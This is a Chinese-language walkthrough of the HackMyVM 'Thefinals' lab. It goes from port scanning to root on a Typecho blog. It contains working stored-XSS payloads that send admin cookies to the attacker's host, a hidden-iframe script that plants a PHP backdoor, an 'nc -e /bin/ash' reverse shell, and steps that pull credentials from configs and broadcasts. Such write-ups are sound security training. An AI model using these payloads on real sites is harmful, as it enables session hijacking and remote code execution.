HackMyVM-Thefinals-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.165  08:00:27:3a:16:eb       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:77:39       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.042 seconds (125.37 hosts/sec). 4 responded
❯ export ip=192.168.60.165
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.165:22
Open 192.168.60.165:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 22:07 CST
Initiating ARP Ping Scan at 22:07
Scanning 192.168.60.165 [1 port]
Completed ARP Ping Scan at 22:07, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:07
Completed Parallel DNS resolution of 1 host. at 22:07, 0.17s elapsed
DNS resolution of 1 IPs took 0.17s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:07
Scanning 192.168.60.165 [2 ports]
Discovered open port 80/tcp on 192.168.60.165
Discovered open port 22/tcp on 192.168.60.165
Completed SYN Stealth Scan at 22:07, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.165
Host is up, received arp-response (0.00057s latency).
Scanned at 2025-04-29 22:07:44 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:3A:16:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.165
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 15280]
/blog                 (Status: 301) [Size: 313] [--> http://192.168.60.165/blog/]
/images               (Status: 301) [Size: 315] [--> http://192.168.60.165/images/]
/screenshots          (Status: 301) [Size: 320] [--> http://192.168.60.165/screenshots/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.60.165/css/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.60.165/js/]
/fonts                (Status: 301) [Size: 314] [--> http://192.168.60.165/fonts/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

有个/blog是基于 Typecho框架搭建的

并且在首页中发现存在域名THEFINALS.hmv

编辑hosts添加域名

❯ echo "$ip THEFINALS.hmv"|sudo tee /etc/hosts
[sudo] password for Pepster:
192.168.60.165 THEFINALS.hmv

尝试枚举一下子目录，无果

存储型 XSS

还是专注于Typecho博客吧

通过探测服务版本，得知博客版本为1.2.0

尝试搜寻网上有没有版本漏洞

正好有个XSS漏洞

在 v1.2.1-rc 中仍然存在 XSS 漏洞 ·问题 #1560 ·Typecho/Typecho

Typecho <= 1.2.0 Comments URL with Stored-XSS Vulnerability - 1manityの秘密基地

Typecho<=1.2.0 存储型XSS 复现 - SuperWinner - 博客园

利用条件非常简单，只需要在Website部分写入以下payload即可

http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#

而且在开头第一篇文章中写明了，管理员会定期检查，可以猜测靶机中存在定时任务查看文章中的评论

可以尝试劫持管理员Cookie

使用如下payload

http://xxx.xxx.com/"></a><script>document.location='http://192.168.60.100:8000/abc?c='+document.cookie</script><a/href="#

监听端口

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.1 - - [29/Apr/2025 22:41:27] code 404, message File not found
192.168.60.1 - - [29/Apr/2025 22:41:27] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_remember_author=aaa;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_mail=aaa%40aaa.com;%207d07d00c3730d08dbac222ccaf73fd49__typecho_remember_url=http%3A%2F%2Fxxx.xxx.com%2F%22%3E%3C%2Fa%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.60.100%3A8000%2Fxss.php%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E%3Ca%2Fhref%3D%22%23 HTTP/1.1" 404 -
192.168.60.165 - - [29/Apr/2025 22:42:02] code 404, message File not found
192.168.60.165 - - [29/Apr/2025 22:42:02] "GET /xss.php?c=7d07d00c3730d08dbac222ccaf73fd49__typecho_uid=1;%207d07d00c3730d08dbac222ccaf73fd49__typecho_authCode=%24T%24STEAJUfF0b618b5d188a8110f0e5dbe8a293e91bb;%20PHPSESSID=63171510946a3cb316930bd5b0f8bd0b HTTP/1.1" 404 -

得到管理员的Cookie后，尝试伪造Cookie访问admin管理页面

刷新后，竟然还是不行

此XSS是存储型，我没法重新访问文章了，一旦访问就会跳转到我的http服务

重装靶机后，或者抓发评论的包

利用js脚本，在页面中引用此脚本

http://xxx.xxx.com/"></a><script/src=http://192.168.60.100:8000/cookie.js></script><a/href="#

同时在本地写入cookie.js文件

❯ echo 'x=new XMLHttpRequest;x.open("GET","http://192.168.60.100:8000?cookie="+btoa(document.cookie));x.send();' > cookie.js

同样也能抓到Cookie值

当然利用XSS可以让管理员在访问评论的时候劫持管理员的操作

利用iframe加载主题编辑页面，通过DOM操作篡改文件内容，在404.php中插入PHP后门

// 在页面末尾插入隐藏的 iframe
function insertIframe() {
    const currentPath = window.location.pathname;
    const isCommentPage = currentPath.includes("manage-comments.php");
    
    // 动态生成 iframe 的 src
    let targetSrc;
    if (isCommentPage) {
        targetSrc = currentPath.replace(
            'manage-comments.php',
            'theme-editor.php?theme=default&file=404.php'  // 修复 & → &
        );
    } else {
        targetSrc = '/admin/theme-editor.php?theme=default&file=404.php';
    }

    // 使用模板字符串优化可读性
    const iframeHTML = `
        <iframe 
            id="theme_id" 
            src="${targetSrc}" 
            width="0%" 
            height="0%" 
            onload="writeShell()"
        ></iframe>
    `;

    // 插入到页面底部
    document.body.innerHTML += iframeHTML;
}

// 防止重复执行
let isSaved = false;

// 在 iframe 中注入 PHP 代码并触发保存
function writeShell() {
    if (isSaved) return;

    const iframeWindow = document.getElementById('theme_id').contentWindow;
    const editorContent = iframeWindow.document.getElementById('content');
    const saveButton = iframeWindow.document.getElementsByTagName('button')[1];

    // 插入 PHP 代码到编辑器
    editorContent.value = '<?php phpinfo(); ?>\n' + editorContent.value;
    
    // 模拟点击保存按钮
    saveButton.click();
    isSaved = true;
}

// 执行入口
insertIframe();

我们可以尝试修改webshell内容为<?php exec("nc 192.168.60.100 4444 -e /bin/ash");?>\n

因为靶机上没有bash，只有ash

等待管理员访问修改页面后

尝试访问

http://thefinals.hmv/blog/usr/themes/default/404.php

用户提权

监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from thefinals.hmv-192.168.60.166-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/thefinals.hmv~192.168.60.166_Linux_x86_64/2025_05_02-17_12_57-296.log 📜
────────────────────────────────────────────────────────────────────
/var/www/html/blog/usr/themes/default $

发现存在三个用户june scotty staff

/var/www/html/blog/usr/themes/default $ cat /etc/passwd |grep ash
june:x:1001:100::/home/june:/bin/ash
scotty:x:1002:100::/home/scotty:/bin/ash
staff:x:1000:100::/home/staff:/bin/ash

可以进入june用户家目录，得到user flag

并且还得到提示

/home/june $ cat user.flag
……………………

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

/home/june $ ls -la
total 16
drwxr-sr-x    2 june     users         4096 Apr  3 17:00 .
drwxr-xr-x    5 root     root          4096 Apr  3 13:21 ..
lrwxrwxrwx    1 root     users            9 Apr  3 12:24 .ash_history -> /dev/null
-rw-r--r--    1 june     users          183 Apr 15 08:28 message.txt
-rw-r--r--    1 june     users         3421 Apr  3 12:29 user.flag
/home/june $ cat message.txt
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
                                                              --- This BROADCAST has been hacked by CNS
参赛者们，准备好并整装待发！谁拿到了钥匙？谁有胆量？  
                                                              --- 此广播已被CNS入侵                                                     

在根目录中可以发现/opt文件夹不可读，只有staff可以读

/ $ ls -al
total 80
…………………………
drwxrwx---    3 root     staff         4096 Apr  3 13:29 opt
…………………………

我尝试搜索其他信息，得到staff用户的hash

不过爆不出来，遂放弃

/var/www/html/blog $ cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));

// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');

// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');

// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');

// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';

// init
\Typecho\Common::init();

// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
  'host' => 'localhost',
  'port' => 3306,
  'user' => 'typecho_u',
  'password' => 'QLTkbviW71CSRZtGWIQdB6s',
  'charset' => 'utf8mb4',
  'database' => 'typecho_db',
  'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
/var/www/html/blog $ mysql -utypecho_u -pQLTkbviW71CSRZtGWIQdB6s
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 57
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| test               |
| typecho_db         |
+--------------------+
3 rows in set (0.004 sec)

MariaDB [(none)]> use typecho_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [typecho_db]> show tables;
+-----------------------+
| Tables_in_typecho_db  |
+-----------------------+
| typecho_comments      |
| typecho_contents      |
| typecho_fields        |
| typecho_metas         |
| typecho_options       |
| typecho_relationships |
| typecho_users         |
+-----------------------+
7 rows in set (0.001 sec)

MariaDB [typecho_db]> select * from typecho_users;
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name  | password                           | mail                | url                       | screenName | created    | activated  | logged     | group         | authCode                         |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
|   1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | [email protected] | http://thefinals.hmv/blog | staff      | 1743647281 | 1746628622 | 1746628562 | administrator | 90814ec07c16a76283201f52dbc740b0 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
1 row in set (0.002 sec)

MariaDB [typecho_db]> exit
Bye

因为有三个用户，其中june用户可读，staff用户 无果后

私钥广播

尝试寻找scotty用户的相关文件

存在一个日志文件，内容好像是不断的向某个ip的1337端口发包

/home $ find / -user scotty -type f 2>/dev/null |grep -Ev "proc"
/var/log/scotty-main.err
/var/log/scotty-main.log
/home $ cat /var/log/scotty-main.err
/home $ head /var/log/scotty-main.log
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337

尝试监听1337端口

利用udp模式

得到一段密文

/home $ nc -lvp 1337
listening on [::]:1337 ...

/home $ nc -u -lp 1337
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K

解码一下，得到私钥内容

Root提权

ssh连接一下，用户拥有sudo权限可以执行/sbin/secret

/home $ cd /tmp/
/tmp $ vi id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEwAAAJgDc/YUA3P2
FAAAAAtzc2gtZWQyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEw
AAAECv7kfeoXOQCi5CRIWdHiDT5upKyY3vQxAlKmxEQzRZLDXCfT3imE6qx9uj6jcIFiI3
fEDXrKYpJtfZRjfbH8ATAAAAEnJvb3RAdGhlZmluYWxzLmhtdgECAw==
-----END OPENSSH PRIVATE KEY-----
/tmp $ chmod 600 id_rsa
/tmp $ ssh [email protected] -i id_rsa
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:EzmhY2U9+FvurEu825jyirPaiFVcHNA2joTW03K3glk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).

thefinals:~/cns_boardcast$ sudo -l
Matching Defaults entries for scotty on thefinals:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
    (ALL) NOPASSWD: /sbin/secret
thefinals:~/cns_boardcast$ sudo /sbin/secret -h
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
thefinals:~/cns_boardcast$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied

报错了，显示无权操作该终端

得知终端 /dev/pts/99 不存在

thefinals:~/cns_boardcast$ ls -al /dev/pts/99
ls: /dev/pts/99: No such file or directory

那我们可以利用python不断的新建终端，增加tty数量，直到99个

/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
/tmp $ python -c "import pty;pty.spawn('/bin/ash')"
………………………………*99

然后再次运行secret程序

在另一个tty中即可收到用户凭证

thefinals:~$ sudo  /sbin/secret
------------------------
/tmp $ root:p8RuoQGTtlKLAjuF1Tpy5wX

尝试登录一下，结果登录不上

thefinals:~$ su root
Password:
su: incorrect password

尝试登录mysql的用户凭证

得到最终的root凭证root:BvIpFDyB4kNbkyqJGwMzLcK

thefinals:~$ mysql -uroot -pp8RuoQGTtlKLAjuF1Tpy5wX
mysql: Deprecated program name. It will be removed in a future release, use '/usr/bin/mariadb' instead
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 268
Server version: 11.4.5-MariaDB Alpine Linux

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| secret             |
| sys                |
| test               |
| typecho_db         |
+--------------------+
7 rows in set (0.007 sec)

MariaDB [(none)]> use secret
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secret]> show tables;
+------------------+
| Tables_in_secret |
+------------------+
| user             |
+------------------+
1 row in set (0.001 sec)

MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password                |
+----+----------+-------------------------+
|  1 | root     | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.002 sec)

登录即可，作者还整理好了各个用户的凭证及相关flag，细心🫡

thefinals:~$ su
Password:
/home/scotty # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/scotty # cd /
/ # cd /root
~ # ls -la
total 32
drwx------    5 root     root          4096 Apr  3 16:58 .
drwxr-xr-x   22 root     root          4096 Apr  3 11:48 ..
lrwxrwxrwx    1 root     root             9 Apr  3 10:06 .ash_history -> /dev/null
drwxr-xr-x    3 root     root          4096 Apr  3 11:31 .cache
-rw-r--r--    1 root     root            29 Apr  3 17:54 .cns_secret
drwxr-xr-x    4 root     root          4096 Apr  3 11:49 .config
lrwxrwxrwx    1 root     root             9 Apr  3 12:24 .mariadb_history -> /dev/null
drwx------    3 root     root          4096 Apr  3 11:52 .pki
lrwxrwxrwx    1 root     root             9 Apr  3 12:56 .viminfo -> /dev/null
-rw-r--r--    1 root     root           746 Apr  3 14:47 note.txt
-rwxrwx---    1 root     root           242 Apr  3 13:54 root.flag
~ # cat note.txt
ssh://[email protected]:BvIpFDyB4kNbkyqJGwMzLcK
ssh://[email protected]:qDCsBTj30cQyityMh3Rnyys
ssh://[email protected]:aYTmcORsUrmwaKa7C2DBLCh
ssh://[email protected]:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://[email protected]:n3nPbqEOhs6eTcchyqXTXWi
typecho://[email protected]:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/

后记

在/opt下存放的就是定时访问comments评论的脚本

利用chromium-browser无头模式自动化执行登录后台截图

from playwright.sync_api import sync_playwright

import time

STAFF_USERNAME = 'staff'
STAFF_PASSWORD = 'n3nPbqEOhs6eTcchyqXTXWi'

def run(playwright):
    browser = playwright.chromium.launch(headless=True, executable_path='/usr/bin/chromium-browser')
    page = browser.new_page()

    page.goto('http://thefinals.hmv/blog/admin/manage-comments.php')

    page.fill('//form[@name="login"]//input[@id="name"]', STAFF_USERNAME)
    page.fill('//form[@name="login"]//input[@id="password"]', STAFF_PASSWORD)

    page.click('//p[@class="submit"]//button[@type="submit"]')

    page.wait_for_load_state('networkidle')

    timestrap = int(time.time())
    page.screenshot(path=f'/var/www/html/screenshots/{timestrap}.png')

    browser.close()

with sync_playwright() as playwright:
    run(playwright)c